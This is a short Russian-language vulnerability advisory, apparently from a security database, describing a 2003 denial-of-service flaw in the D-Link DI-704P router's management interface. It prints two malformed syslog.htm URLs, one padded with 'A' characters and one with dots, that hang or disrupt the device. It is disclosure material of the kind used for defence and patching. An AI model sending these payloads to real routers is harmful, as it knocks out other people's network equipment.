DoS против D-Link DI-704P Router

Дата публикации:
03.06.2003
Всего просмотров:
1154
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Отказ в обслуживании обнаружен в D-Link DI-704P Router. Удаленный авторизованный пользователь может завесить работу управляющего интерфейса.

Удаленный авторизованный пользователь может послать специально сформированный URL к управляющему интерфейсу маршрутизатора, чтобы нарушить работу устройства. Следующий URL заставит устройство выполнить DNS запрос:

 
http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Результат DNS запроса будет следующий:
 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@xxxx.xx.comcast.net
Если представлено несколько подобных URL запросов, временный отказ в обслуживании произодет на маршрутизаторе.

Следующий тип URL завесит управляющий интерфейс маршрутизатора, пока он не будет перезагружен: (работа маршрутизатора не нарушится):

http://192.168.0.1/syslog.htm?
D=............................. ............................................
...........................................................................
............................................... ............................
...........................................................................
............................................................... ............
...........................................................................
...........................................................................
.. .........................................................................
...........................................................................
.................. .........................................................
....................
Уязвимость обнаружена в D-Link DI-704P

Ссылки: Buffer Overflow? Local Malformed URL attack on D-Link 704p router
или введите имя

CAPTCHA